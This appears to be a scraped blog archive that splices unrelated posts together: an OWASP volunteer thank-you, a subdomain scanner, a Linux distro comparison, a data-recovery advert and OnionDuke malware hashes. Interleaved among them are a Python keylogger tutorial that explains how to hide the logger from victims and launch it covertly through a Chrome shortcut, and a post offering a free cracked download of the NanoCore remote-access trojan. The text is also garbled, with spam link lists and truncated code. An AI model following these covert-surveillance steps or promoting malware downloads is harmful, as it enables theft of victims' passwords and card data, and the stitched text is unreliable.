Kamis, 21 Mei 2020

Thank You To Volunteers And Board Members That Worked BlackHat Booth 2019

The OWASP Foundation would like to thank the OWASP Las Vegas Chapter Volunteers for taking the time out of their busy schedule to give back and volunteer to work the booth at BlackHat 2019.  It was great meeting our Las Vegas OWASP members and working with Jorge, Carmi, Dave, and Nancy.  
Also, take a moment to thank Global Board Members Martin Knobloch, Owen Pendlebury, and Gary Robinson for also working the booth and speaking with individuals and groups to answer questions on projects and suggestions on the use of our tools to address their work problems.
OWASP can not exist without support from our members.  More info
  1. Ingeniería Social El Arte Del Hacking Personal
  2. Cracker Informatico
  3. Hacking Life

PortWitness - Tool For Checking Whether A Domain Or Its Multiple Sub-Domains Are Up And Running

PortWitness is a bash tool designed to find out active domain and subdomains of websites using port scanning. It helps penetration testers and bug hunters collect and gather information about active subdomains for the domain they are targeting.PortWitness enumerates subdomains using Sublist3r and uses Nmap alongwith nslookup to check for active sites.Active domain or sub-domains are finally stored in an output file.Using that Output file a user can directly start testing those sites.
Sublist3r has also been integrated with this module.It's very effective and accurate when it comes to find out which sub-domains are active using Nmap and nslookup.
This tool also helps a user in getting the ip addresses of all sub-domains and stores then in a text file , these ip's can be used for further scanning of the target.

git clone https://github.com/viperbluff/PortWitness.git

This tool has been created using bash scripting so all you require is a linux machine.

bash portwitness.sh url

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How To Make A Simple And Powerful Keylogger Using Python

A keylogger is a computer program which can be written using any computer programming language such as c++ when you install it on a Victim system it can keep the records of every keystroke in a text file. Keylogger is mainly used to steal confidential data such as passwords, credit card numbers etc.

How to make a python keylogger?

A keylogger can be programmed using any programming language such as c++, java, c# e.tc. For this tutorial, I will use python to make a keylogger, because python is flexible, powerful and simple to understand even a non-programmer can use python to make a keylogger.
Requirements to create a python keylogger
  • Computer With Operating system: Windows, Mac os or Linux
  • Python must be installed on the system
  • Pip (Python index package ) you will need this to install python software packages.
  • Pypiwin32 and PyHook packages
  • Basic understanding of computers
You will learn to install these things one by one. If you have already installed and configured the python development kit feel free to skip Part 1.
Part 1: Downloading Python and pip, setting up the environment to create the keylogger.Step 1:
Download python development kit by clicking here.
Choose python 2.7 because I am using this version. It is ok if you have a different version of python this method will work on every version of python.
Step 2:
Installation of python is pretty simple.Open the python setup file, Mark the checkboxes Very important else you have to set the python path manually, and click on Install Now.
Step 3:
You need Pypiwin32 and PyHook python packages to create python keylogger. To install these packages you need pip, you can install Pypiwin32 and PyHook without using pip which is not recommended.
To download pip go to https://pip.pypa.io/en/stable/installing/ and Save link as by right clicking on get-pip.py. when the download is done, just run the get-pip.py file.
Now you need to set the Variable path for pip to do this right click on the computer icon and choose properties.
Now click on the Advanced system settings
Choose Environment Variables.
Choose New, Set the Variable name: PATH and Variable value as C:\Python27\Scripts
Click on ok.
Part 2: Installing Pypiwin32 and PyHook python Packages using pip:
Open Command Prompt(CMD) and type: pip installs Pypiwin32 press the Enter Key, wait for the installation to complete. After the Pypiwin32 package installation type: pip install PyHook press the Enter Key and wait for the installation to complete.When done close the Command Prompt.
Part 3: Creating and testing the python keylogger:
Now you have configured your environment and installed all the necessary packages, let's start creating the keylogger. Click on the start menu and scroll down until you find Python 2.7, run python IDLE(GUI) by clicking on it.
Go to the File, from the drop-down menu choose New file.

Python Keylogger source code:

Copy these lines of code and paste into the new file. Modify the directory in the second line of code to your own location e.g 'C:\test\log.txt' this will create a folder named test in C save the log.txt file there when the Keylogger start.
import pyHook, pythoncom, sys, logging
def onKeyboardEvent(event):
return True
Save your file as a test.pyw at any location you want, the .pyw extension is very important because of it the python keylogger will run in the background without notifying the user.
The Python Keylogger is now completed you can test it out by opening it and typing some text in your browser, go to the log.txt file which is in the F:\test\log.txt on my PC. You will find your log.txt file in C:\test\log.txt.But what if you want to test it on someone else computer? you want to run it without the user knowing that it has been launched, this can be done by attaching it to the program that the victim always uses such as Google Chrome.
Let's make the python keylogger auto-launchable by attaching it the Google Chrome.
Copy the following code and paste into notepad. Save it by giving .bat extension e.g launch.bat in a hidden location, e.g c:\test\launch.bat
Now right click on the google chrome desktop shortcut icon and click on properties. You will see a field called Target. Change the target field to the batch file launch.bat directory that you created. let's say you have saved your launch.bat file in a test folder in C, Then change the target field with "C:\test\launch.bat". Now, whenever the user opens chrome the keylogger will run automatically.
Continue reading

  1. Hacking Windows: Ataques A Sistemas Y Redes Microsoft
  2. Ethical Hacking Course
  3. Ingeniería Social. El Arte Del Hacking Personal Pdf
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  5. Aprender A Hackear Desde Cero
  6. Growth Hacking Sean Ellis
  7. Que Estudiar Para Ser Hacker
  8. Curso De Hacking Etico
  9. Hacking Tools
  10. Un Hacker
  11. Hacking Iphone
  12. Curso De Hacking Etico
  13. House Hacking
  14. Hacking Games Online


Who is hacker?
A hacker is a Creative person and a creative Programmer,who have knowledge about Networking,Operating system,hacking & a best creative social engineer who control anyone's mind he is also a knowledgeable person.
Hacker are the problem solver and tool builder.


A hacker is an individual who uses computer, networking and other skills to overcome a technical problem but it often refers to a person who uses his or her abilities to gain unauthorized access to system or networks in  order to commit crimes. 

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How Block Chain Technology Can Help Fight Wuhan Corona Virus Outbreak

As the death toll and the infected cases of widespread coronavirus continue to increase, global organizations and the tech industry has come forward with technology like blockchain to fight coronavirus.

Along with the equipment and monetary support, technology also withstands against the virus with better plans and solutions. Hence, tech industries have started leveraging blockchain technology in the wake of a global health emergency.

Blockchain Helps In Real-Time Online Tracking

The Center for Systems Science and Engineering has already set up an online platform to track coronavirus and visualize the growing number of infected patients in real-time.

But Acoer, an Atlanta-based blockchain app developer, has also launched an alternative online data visualization tool to easily trail and depict the Cororanvirus outbreak using blockchain technology.

Acoer platform, named HashLog, is more advanced and clear as it pulls the data from the Hedera Hashgraph database using the HashLog data visualization engine.

Hedera Hashgraph is an immutable, transparent and decentralized database based on distributed ledger technology that provides synchronized and unchangeable data from the public networks.

Moreover, researchers, scientists, and journalists can use the HashLog dashboard to understand the spread of the virus and act against it swiftly.

For data sources, Johns Hopkins CSSE extracts data from WHO, CDC, ECDC, NHC, and DXY. On the other hand, Acoer maps the public data, including data from the Center for Disease Control (CDC) and the World Health Organization (WHO). Therefore, data may differ on both platforms.

(left) CSSA and Acoer (right)

Blockchain Can Help Monitor And Control Money Flow

To fight the further spread of the coronavirus (2019-nCoV) outbreak globally, China has also received abundant monetary support from the international community to create better action plans.

China's govt-led organization and charities are responsible for overseeing and utilizing the influx of money to research and generate a solution for coronavirus. But due to the lack of coordination and mismanagement among the various organization, money is not being laid out to curb the crisis.

Recently, a paper published by Syren Johnstone, from the University of Hong Kong, discusses the problems encountered by charities, in China and elsewhere. It argues that the present crisis should be seen as a call to arms.

Syren urges for a borderless solution with better management of donations and implementation using the emerging tech like Blockchain and Artificial Intelligence.

Keeping that in mind, Hyperchain, a Chinese company, also announced blockchain-based charity platform to streamline the donation from all over the world.

Since the Hyperchain platform is based on the blockchain, it offers more transparency among the sender and receiver of funds to bring trust and immutability to restrict the transaction data deletion.

Overall, Hyperchain improves administrative function for the money and also extends the logistics actions.


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Rabu, 20 Mei 2020


NanoCore is one of the most powerful RATs ever created. It is capable of taking complete control of a victim's machine. It allows a user to control the system with a Graphical User Interface (GUI). It has many features which allow a user to access remote computer as an administrator. Download nanocore rat cracked version free of cost.
NanoCore's developer was arrested by FBI and pleaded guilty in 2017 for developing such a malicious privacy threat, and sentenced 33 months in prison.


  • Complete Stealth Remote Control
  • Recover Passwords from the Victim Device
  • Manage Networks
  • Manage Files
  • Surveillance
  • Plugins (To take it to the next level)
  • Many advanced features like SCRIPTING


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Deepin Or UbuntuDDE

I'm sure nowadays many Deepin users are thinking in changing to UbuntuDDE, so let's explain some differences between both Linux distros.

1. Community

At least in the main telegram channel Deepin has more than 2.000 users, but UbuntuDDE is new in beta version and have about 500 users.

    2. Boot

Despite de booting sound is the same in both distros, Deepin's animation is nicer than ubuntu's which uses a too bright background.


    3. Default memory and CPU usage

The CPU usage is similar, but Deepin by default is using more processes, more network connections and more drivers than UbuntuDDE.

  4.  Workspaces

UbuntuDDE allows up to 7 workspaces meanwhile Deepin right now only allows 4.
Is not only more workspaces for UbuntuDDE, it's also the more eficient way to display them.

    5.  Software Versions

Deepin is based on Debian so the program versions on store and apt are old but stable, and can have problems with the old libraries installed on the system when compiling new software.

We can see below that Ubuntu's compiler version is quite new, the 9.3.0 which is quite well, but Deepin's version is 6.3.0.

Regarding the kernels, UbuntuDDE has the and Deepin the 4.15.0-30, the libc in both systems is updated.

    6.  The store

Deepin's store is fast and polished and contain the main software, but and the UbuntuDDE


Deepin is the most used of both and it's the original one, but many users are trying the UbuntuDDE (which is beta for now) because the need of using recent versions, also the 4 workspaces on Deepin is another limitation for some Linux users. Probably Deepin v20 will overcome the limitations but the main decision is between Debian as base system or ubuntu, and for more users the trend in workstations is ubuntu.


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Selasa, 19 Mei 2020

How To Recover Files That Are Deleted From Recycle Bin

How To Recover Files That Are Deleted From Recycle Bin

How To Recover Files That Are Deleted From Recycle Bin

How To Recover Files That Are Deleted From Recycle Bin

Well, Windows users have a bad habit of removing files from recycle bin. Deleting useless files from Recycle Bin helps a user to save some storage space which can improve the speed of a computer. However, Windows users do that more frequently and later regret. Actually, Recycle Bin is a place from where we can get back our deleted files and folders.
Sometimes, we accidentally delete our important files and folders and due to some reason we lose them from Recycle bin too! At that time, we search for recovery methods. Well, there are many methods available over the web which can help you to recover deleted files from computer, but, when it comes to reliability, nothing can beat EaseUS.

What Is EaseUS Data Recovery Wizard?

EaseUS is one of the leading software providers which is known for its data recovery programme. EaseUS offers some free data recovery software that can help you to recover deleted, formatted or lost data from PC, laptop or removable device easily and quickly.
One of the best thing about EaseUS is that it provides tools for recycle bin recovery which can help you to get back files that you have deleted from the Recycle bin itself. EaseUS Data Recovery Wizard free can easily recover lost files, pictures, documents, videos and more from deleting, formatting, partition loss, OS crash, virus attack and other data loss cases.

How To Recover Deleted Files?

If you are struggling to get back your lost data files, then here is an easy data recovery method which will help you to get back deleted files on your computer. Below, we are going to share a mini guide on how to use EaseUS Recycle Bin Recovery to get back your deleted data.
Step 1. First of all, you need to download and install EaseUS Data Recovery Wizard on your Windows computer and then launch it normally. You need to select the location where you want to scan and then click on 'Scan'
Step 2. Now, wait for few minutes until the tool finishes scanning your drive. The tool search for files that got deleted or cleaned from the Recycle Bin.
Step 3. Now it will show you files that you can recover. Here you need to click on the file which you want to recover and click on 'Recover'
That's it, you are done! This is how you can use EaseUS data recovery to get back your deleted files on your computer.

Benefits of EaseUS Data Recovery

Well, the data recovery tool provided by EaseUS comes with many benefits. It can not only recover accidentally deleted files, but it can also recover data in case of Virus Attacks, Hard Disk Damage, OS Crash etc.
You can also use this awesome data recovery wizard to recover deleted files from External Disk, USB Drive, Camcorder, Mobile Devices, Zip Drive, iPod, Music Player and more.
Overall, this is one of the best data recovery tools you can have on your Windows computer. EaseUS Data Recovery also has a free version with restricted features. Overall, this is a stress-free solution to get back your deleted files

More info

Senin, 18 Mei 2020

OnionDuke Samples

File attributes

Size: 219136
MD5:  28F96A57FA5FF663926E9BAD51A1D0CB

Size: 126464
MD5:  C8EB6040FD02D77660D19057A38FF769

Size: 316928
MD5:  D1CE79089578DA2D41F1AD901F7B1014

Virustotal info

SHA256: 366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b
File name: 366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b
Detection ratio: 8 / 52
Analysis date: 2014-11-15 18:37:30 UTC ( 8 hours, 44 minutes ago ) 
Antivirus Result Update
Baidu-International Trojan.Win32.Agent.adYf 20141107
F-Secure Backdoor:W32/OnionDuke.B 20141115
Ikarus Trojan.Win32.Agent 20141115
Kaspersky Backdoor.Win32.MiniDuke.x 20141115
Norman OnionDuke.A 20141115
Sophos Troj/Ransom-ALA 20141115
Symantec Backdoor.Miniduke!gen4 20141115
Tencent Win32.Trojan.Agent.Tbsl 20141115


SHA256: 366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b
File name: 366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b
Detection ratio: 8 / 52
Antivirus Result Update
Baidu-International Trojan.Win32.Agent.adYf 20141107
F-Secure Backdoor:W32/OnionDuke.B 20141115
Ikarus Trojan.Win32.Agent 20141115
Kaspersky Backdoor.Win32.MiniDuke.x 20141115
Norman OnionDuke.A 20141115
Sophos Troj/Ransom-ALA 20141115
Symantec Backdoor.Miniduke!gen4 20141115
Tencent Win32.Trojan.Agent.Tbsl 20141115

SHA256: 0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade
File name: 0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade
Detection ratio: 19 / 55
Analysis date: 2014-11-15 18:37:25 UTC ( 8 hours, 47 minutes ago ) 
Antivirus Result Update
AVware Trojan.Win32.Generic!BT 20141115
Ad-Aware Backdoor.Generic.933739 20141115
Baidu-International Trojan.Win32.OnionDuke.BA 20141107
BitDefender Backdoor.Generic.933739 20141115
ESET-NOD32 a variant of Win32/OnionDuke.A 20141115
Emsisoft Backdoor.Generic.933739 (B) 20141115
F-Secure Backdoor:W32/OnionDuke.A 20141115
GData Backdoor.Generic.933739 20141115
Ikarus Trojan.Win32.Onionduke 20141115
Kaspersky Backdoor.Win32.MiniDuke.x 20141115
McAfee RDN/Generic BackDoor!zw 20141115
McAfee-GW-Edition BehavesLike.Win32.Trojan.fh 20141114
MicroWorld-eScan Backdoor.Generic.933739 20141115
Norman OnionDuke.B 20141115
Sophos Troj/Ransom-ANU 20141115
Symantec Backdoor.Miniduke!gen4 20141115
TrendMicro BKDR_ONIONDUKE.AD 20141115
TrendMicro-HouseCall BKDR_ONIONDUKE.AD 20141115
VIPRE Trojan.Win32.Generic!BT 20141115

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